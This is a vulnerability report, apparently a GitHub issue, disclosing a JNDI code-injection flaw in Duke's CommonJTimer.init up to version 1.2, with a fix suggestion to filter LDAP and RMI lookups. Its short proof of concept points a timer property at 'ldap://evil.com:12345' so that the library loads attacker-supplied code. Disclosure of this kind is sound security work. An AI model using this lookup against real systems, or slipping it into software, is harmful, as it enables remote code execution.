There's a code injection vulnerability of no.priv.garshol.duke.server.CommonJTimer.init #273
Description
Affected Version
The latest version 1.2 and below.
Describe the vulnerability
no.priv.garshol.duke.server.CommonJTimer.init(Properties) is designed to initialize a timer. However, passing an unchecked argument to this API can lead to the execution of arbitrary codes. For instance, following codes will lead to the execution of arbitrary codes from attackers:
CommonJTimer timer = new CommonJTimer();
Properties timerProperties = new Properties();
timerProperties.setProperty("duke.timer-jndipath", "ldap://evil.com:12345");
timer.init(timerProperties);
To Reproduce
Build an LDAP server and provide malicious codes. Then just execute above codes would reproduce it.
Fix Suggestion
Filter LDAP, RMI and related protocols when using lookup.